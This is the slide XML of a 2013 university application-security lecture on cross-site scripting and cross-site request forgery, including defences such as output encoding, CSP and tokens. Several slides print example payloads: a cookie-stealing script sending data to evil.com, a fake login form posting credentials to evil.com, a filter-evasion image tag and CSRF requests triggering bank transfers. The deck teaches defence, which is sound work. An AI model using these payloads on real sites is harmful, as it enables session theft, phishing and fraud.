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68" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="283" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="282" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="286" r:id="rId19"/>
    <p:sldId id="287" r:id="rId20"/>
    <p:sldId id="288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24" r:id="rId54"/>
    <p:sldId id="270" r:id="rId55"/>
    <p:sldId id="265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00"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="131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9" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102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66F15-64CE-44F6-AF51-8F568C022106}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/12/2013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05D92-3DF3-46AE-AA3E-E4F00EDC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343F-1CE6-4DBC-81D0-0B6C4F0D4CEA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9297-094B-4D43-A2BC-251F70F7FAC6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1244-2662-4920-9F2A-89027007E985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F28C-CA03-417A-BB11-4581E88297A7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8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E42-88DE-4DAE-BEE6-F990EFC56C39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1E9-EBCB-4F75-92F3-F2DCBCACB9FA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2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1"/>
            <a:ext cx="4041775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2E2A-7803-4D06-A8B8-49F1F33489B9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5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B316-30AA-4DF3-9FF0-A99B6D420566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DD29-E6DC-41B0-9328-87E0347E6B3D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0766-FF88-4569-AE43-2DC25C757AC3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0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5A12-29E9-4A8B-BF11-BE0A3FC00240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64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D201-9091-4BC7-8645-E6644BE2C723}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/12/2013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6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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week </a:t>
            </a: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Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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todd.whittaker@franklin.edu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Input sent in one request is immediately reflected in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819400"/>
            <a:ext cx="8077200" cy="3429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Check out these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great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href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"http://somesite.com/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search?q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=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%3Cscript%3Edocument.write(%22%3Cimg%20src%3D%27http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%3A%2F%2Fevil.com%2Fxss%3F%22%2Bencode(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%2B%22%27%2F%3E%22)%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3B%3C%2Fscript%3E"&gt;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pictures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of my party last weekend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!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2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66613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Input sent in one request is immediately reflected in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819400"/>
            <a:ext cx="8077200" cy="3429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Check out these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great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href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"http://somesite.com/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search?q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=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%3Cscript%3Edocument.write(%22%3Cimg%20src%3D%27http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%3A%2F%2Fevil.com%2Fxss%3F%22%2Bencode(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%2B%22%27%2F%3E%22)%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3B%3C%2Fscript%3E"&gt;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pictures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of my party last weekend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!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200" dirty="0">
              <a:latin typeface="Consola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24335"/>
            <a:ext cx="6543675" cy="504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65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Input sent in one request is immediately reflected in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819400"/>
            <a:ext cx="8077200" cy="3429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Check out these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great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href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"http://somesite.com/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search?q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=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   %3Cscript%3Edocument.write(%22%3Cimg%20src%3D%27http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%3A%2F%2Fevil.com%2Fxss%3F%22%2Bencode(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%2B%22%27%2F%3E%22)%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3B%3C%2Fscript%3E"&gt;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pictures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a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of my party last weekend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!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200" dirty="0">
              <a:latin typeface="Consolas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24335"/>
            <a:ext cx="6543675" cy="504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4191000" y="762000"/>
            <a:ext cx="4752975" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28851"/>
              <a:gd name="adj2" fmla="val 13394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can be in an email, a web page, or even embedded in a URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shortener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like bit.ly or goo.gl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8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What about if somesite.com only accepts POST rather than GET? Is that safer?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What about if somesite.com only accepts POST rather than GET? Is that safer?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19400"/>
            <a:ext cx="8077200" cy="3505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onload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document.evil.submit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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"evil"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"post"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http://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somesite.com"&gt;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"q"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3Cscript%3E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document.write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(%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22%3Cimg%20src%3D%27http%3A%2F%2F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evil.com%2Fxss%3F%22%2Bencode(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)%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2B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%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22%27%2F%3E%22)%3B%3C%2Fscript%3E"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2335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What about if somesite.com only accepts POST rather than GET? Is that safer?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19400"/>
            <a:ext cx="8077200" cy="3505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onload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document.evil.submit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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"evil"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"post"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http://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somesite.com"&gt;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"q"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3Cscript%3E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document.write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(%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22%3Cimg%20src%3D%27http%3A%2F%2F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evil.com%2Fxss%3F%22%2Bencode(</a:t>
            </a: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)%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2B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%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22%27%2F%3E%22)%3B%3C%2Fscript%3E"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038600" y="1143000"/>
            <a:ext cx="4752975" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8448"/>
              <a:gd name="adj2" fmla="val 15843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We’re still posting to somesite.com but sending cookies to evil.com when the script is reflected.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04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What about if somesite.com only accepts POST rather than GET? Is that safer?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No.  If you run somesite.com and you are vulnerable to reflected XSS, then your users are at risk of having their somesite.com cookies stolen.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52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Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS echoes untrusted input back immediately.  Stored XSS reflects untrusted input back later (after being stored in a database)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored user input is most of the way social media works.  Think what would happen if viewing somebody else’s Tweet, Facebook post, or discussion board post executed a script in your browser?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11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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to reflected XSS, but the somesite.com web author uses local JavaScript to produce part of the page from untrusted user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276600" y="3810000"/>
            <a:ext cx="4752975" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28262"/>
              <a:gd name="adj2" fmla="val -9019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We can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a script into that input and get it rendered locally rather than reflected from the server.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86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Vulnerable script elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anything that alters the document can be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.writeln</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>element.innerHTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>window.navigate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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3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week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p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47CB-F391-4DAB-9FB4-A73A580B607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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts aren’t the only thing we need to prevent the injection of in our sites!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81113" y="2971800"/>
            <a:ext cx="5729287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img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src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jav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&amp;#x0D;ascript:alert('XSS');"&gt;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048000" y="3886200"/>
            <a:ext cx="3733800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40257"/>
              <a:gd name="adj2" fmla="val -9667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Embedded Unicode carriage return to break up a key word.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681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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts aren’t the only thing we need to prevent the injection of in our sites!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81113" y="2971800"/>
            <a:ext cx="5729287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img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src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jav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&amp;#x0D;ascript:alert('XSS');"&gt;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048000" y="3886200"/>
            <a:ext cx="3733800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40257"/>
              <a:gd name="adj2" fmla="val -9667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Embedded Unicode carriage return to break up a key word.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324600" y="1447800"/>
            <a:ext cx="2362200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83707"/>
              <a:gd name="adj2" fmla="val 8291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Even HTML is suspect!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03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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts aren’t the only thing we need to prevent the injection of in our sites!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81113" y="2971800"/>
            <a:ext cx="5729287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img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src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jav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&amp;#x0D;ascript:alert('XSS');"&gt;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048000" y="3886200"/>
            <a:ext cx="3733800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40257"/>
              <a:gd name="adj2" fmla="val -9667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Embedded Unicode carriage return to break up a key word.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324600" y="1447800"/>
            <a:ext cx="2362200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83707"/>
              <a:gd name="adj2" fmla="val 8291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Even HTML is suspect!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94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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Imagine if your somesite.com allowed posting of a comment like this, and reflected it back (notice, no JavaScript)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7924800" cy="2590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"post"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"https://evil.com/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You've been logged out.  Enter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username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and password to continue.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Username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"username" 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Password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 smtClean="0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"password"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"password" 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"Login"&gt;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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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917491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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Imagine if your somesite.com allowed posting of a comment like this, and reflected it back (notice, no JavaScript)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7924800" cy="2590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"post"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"https://evil.com/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You've been logged out.  Enter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username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and password to continue.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Username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"username" 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Password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 smtClean="0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"password"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"password" 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"Login"&gt;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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consola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95400"/>
            <a:ext cx="4167187" cy="28873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304800" y="3429000"/>
            <a:ext cx="3733800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70947"/>
              <a:gd name="adj2" fmla="val -6526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would look like it is coming from your own site, but it would post to evil.com.  Far worse than cookie stealing!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64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injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Imagine if your somesite.com allowed posting of a comment like this, and reflected it back (notice, no JavaScript)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7924800" cy="2590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"post"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"https://evil.com/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xss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You've been logged out.  Enter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username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and password to continue.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Username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"username" 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Password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 smtClean="0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"password"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"password" /&gt;&lt;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br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"Login"&gt;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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consola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95400"/>
            <a:ext cx="4167187" cy="28873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ular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435429" y="1143000"/>
            <a:ext cx="3733800" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 83192"/>
              <a:gd name="adj2" fmla="val 4866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Same origin policies don’t help because we’re sending a request, not trying to read a response.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04800" y="3429000"/>
            <a:ext cx="3733800" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70947"/>
              <a:gd name="adj2" fmla="val -6526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would look like it is coming from your own site, but it would post to evil.com.  Far worse than cookie stealing!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98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hard to do yourself: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>input sanitization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Trying to strip out bad tags, scripts, etc. is tough to get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429000"/>
            <a:ext cx="7924800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document.location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'http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://evil.com/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xss?q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='+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96072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hard to do yourself: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>input sanitization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Trying to strip out bad tags, scripts, etc. is tough to get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429000"/>
            <a:ext cx="7924800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strike="sngStrike" dirty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document.location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'http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://evil.com/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xss?q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='+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trike="sngStrike" dirty="0" smtClean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4343400"/>
            <a:ext cx="3276600" cy="1719165"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67449"/>
              <a:gd name="adj2" fmla="val -6037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Removing &lt;script&gt;junk&lt;/script&gt; just puts the original script back together!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9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hard to do yourself: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>input sanitization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Trying to strip out bad tags, scripts, etc. is tough to get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429000"/>
            <a:ext cx="7924800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strike="sngStrike" dirty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document.location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'http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://evil.com/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xss?q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='+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trike="sngStrike" dirty="0" smtClean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4343400"/>
            <a:ext cx="3276600" cy="1719165"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67449"/>
              <a:gd name="adj2" fmla="val -6037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Removing &lt;script&gt;junk&lt;/script&gt; just puts the original script back together!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2438400"/>
            <a:ext cx="4114800" cy="1719165"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67449"/>
              <a:gd name="adj2" fmla="val -6037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There are way too many ways to get this wrong.  Use a library, and only as a second line of defense.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46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hard to do yourself: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>input sanitization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Trying to strip out bad tags, scripts, etc. is tough to get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429000"/>
            <a:ext cx="7924800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strike="sngStrike" dirty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document.location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'http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://evil.com/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xss?q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='+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scr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 smtClean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strike="sngStrike" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>junk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strike="sngStrike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strike="sngStrike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ipt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4343400"/>
            <a:ext cx="3276600" cy="1719165"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67449"/>
              <a:gd name="adj2" fmla="val -6037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Removing &lt;script&gt;junk&lt;/script&gt; just puts the original script back together!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2438400"/>
            <a:ext cx="4114800" cy="1719165"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67449"/>
              <a:gd name="adj2" fmla="val -6037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There are way too many ways to get this wrong.  Use a library, and only as a second line of defense.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80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cross site scripting attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demonstrate cross site request forgery attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigate XSS and CSRF using encoding and tokens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easy to do yourself: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>output sanitization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Encode the output as it is sent back from the server (reflected or stored).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Beware!  Many different output encodings based on where untrusted data is used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML text, HTML attribute, URL, XML, XML attribute, JavaScript, CSS, etc. all have different encoding requirements.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19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best to do yourself: don’t allow full markup languages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a fly-swatter to kill flies, not a sledgehammer.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48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What is best to do yourself: don’t allow full markup languages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a fly-swatter to kill flies, not a sledgehammer.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438400" y="3657600"/>
            <a:ext cx="5181600" cy="2275114"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35036"/>
              <a:gd name="adj2" fmla="val -7473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Full HTML inputs are sledgehammers when users just want to italicize things.  Consider wiki-markup or markdown as alternatives that can’t be interpreted as a command.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2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Defense techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using a header, prevent browsers from executing “inline” JavaScript.  Only externally sourced JS from a trusted domain will execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only available in Firefox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4267200"/>
            <a:ext cx="6324600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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>X-Content-Security-Policy: allow 'somesite.com'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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95257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CSRF: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussed somewhat already, now much more detail, prevention, and best practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A form of injection in which attackers cause a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>request to be made across domains without authorization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the “same origin” policy of browsers because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the attacker doesn’t need to read the response.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes requests that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do something harmful to the user (i.e. stealing money from their bank)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611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is it accomplished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The browser helpfully sends cookies (authentication proxy) with every request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if this can be embedded in somesite.com through HTML injection?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038600"/>
            <a:ext cx="8153400" cy="457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src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='http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://your.bank.com/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transfer.php?amt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=50&amp;to=31337'&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000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205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is it accomplished</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The browser helpfully sends cookies (authentication proxy) with every request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if this can be embedded in somesite.com through HTML injection?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038600"/>
            <a:ext cx="8153400" cy="457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src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='http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://your.bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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transfer.php?amt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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=50&amp;to=31337'&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000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33400" y="4876800"/>
            <a:ext cx="8153400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -12431"/>
              <a:gd name="adj2" fmla="val -9739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If you have an active session with your.bank.com, this will send your session cookie, thereby authenticating the transfer.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333500" y="2438400"/>
            <a:ext cx="3276600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -53671"/>
              <a:gd name="adj2" fmla="val 12300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Images are requested immediately via GET.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334000" y="2438400"/>
            <a:ext cx="3276600" cy="1003041"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20653"/>
              <a:gd name="adj2" fmla="val 11641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Attacker’s account number.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75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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Switching to POST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514600"/>
            <a:ext cx="8153400" cy="3124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CSRF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onload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document.evil.submit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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"evil"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post“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"http://your.bank.com/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transfer.php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amt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"50"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"to"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"31337"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7435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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Switching to POST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514600"/>
            <a:ext cx="8153400" cy="3124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&lt;!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DOCTYPE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html&gt;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CSRF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title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head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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>onload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document.evil.submit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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"evil"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post“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"http://your.bank.com/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transfer.php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amt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"50"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"to"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"31337"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endParaRPr lang="en-US" sz="1600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428861" y="1600200"/>
            <a:ext cx="3276600" cy="1003041"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64777"/>
              <a:gd name="adj2" fmla="val 12850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“accomplice” page could be phished.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69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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Although, POST is better than GET because of the idea of “safe methods”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe methods do not modify server state.  They’re essentially “read only”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST, DELETE, and PUT do modify server state, and therefore aren’t safe.  GET should be.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XSS: Cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discussed somewhat already, now much more detail, prevention, and best practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A form of injection in which attackers cause a script to be executed in a user’s browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeats the “same origin” policy of browsers because the script seems to originate from the right site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Makes requests that steal data (cookies,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401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Ineffective solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Checking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
